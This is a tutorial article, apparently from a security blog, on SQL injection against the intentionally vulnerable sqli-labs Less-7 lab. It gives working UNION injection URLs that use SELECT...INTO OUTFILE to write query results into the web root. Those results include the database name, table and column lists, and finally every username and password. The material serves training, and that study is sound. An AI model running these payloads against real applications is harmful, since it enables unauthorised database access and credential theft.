In our previous article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. Today we are going to perform SELECT…INTO OUTFILE statement is easiest way of exporting a table records into a text file or excel file
This statement allows user to load table information very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the significant rows to a file, and gives authority to the use of column and row terminators to specify output format. The output file is created directly by the MySQL server, so the filename with path should be specify where user want the file to be written on the server host. The file must not exist already on server. It cannot be overwritten. A user requires the FILE privilege to run this statement.
Open the browser and type following SQL query in URL
From screenshot you can read “you are in….. Use outfile” now let’s try to break this statement.
OKAY! The Query has been broken successfully we receive the error message when we had used single quote (‘) in order to break query hence it confirms that it is vulnerable.
After making lots of efforts finally successfully the query gets fixed, if noticed the step for SQL injection is similar as previous chapter only techniques to fix the query is different.
Now following query will dump the result into a text file. Here you need to mention the path where user wants the file to be written on the server host. The file must not exist already on server user always use new text file for over writing database information.
http://localhost:81/sqli/Less-7/?id=1′)) union select 1,2,3 into outfile “/xampp/htdocs/sqli/Less-7/hack1.txt” –+
From screenshot you can perceive that still it is showing error message now open another tab for the output of resultant query.
Now add file name hack1.txt to check output of above query.
hence you can see we get output of executed query inside text file. This will save hack1.txt file inside the server machine also.
Execute following query to retrieve database name using union injection using a new text file.
http://localhost:81/sqli/Less-7/?id=1′)) union select 1,2,database() into outfile “/xampp/htdocs/sqli/Less-7/hack2.txt” –+
Hence you can see we have successfully get security as database name as result.
Next query will provide entire table names saved inside the database using another text file.
http://localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile “/xampp/htdocs/sqli/Less-7/hack3.txt” –+
From screenshot you can read the following table names:
Now we’ll try to find out column names of users table using following query.
localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’ into outfile “/xampp/htdocs/sqli/Less-7/hack4.txt” –+
Hence you can see it contains so many columns inside it I had chosen only two columns for further enumeration.
At last execute following query to read all username and password inside the table users from inside its column.
http://localhost:81/sqli/Less-7/?id=1′)) union select 1,group_concat(username),group_concat(password)from users into outfile “/xampp/htdocs/sqli/Less-7/hack5.txt” –+
From screenshot you can read the username and password save inside text file.
Note: you can try same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here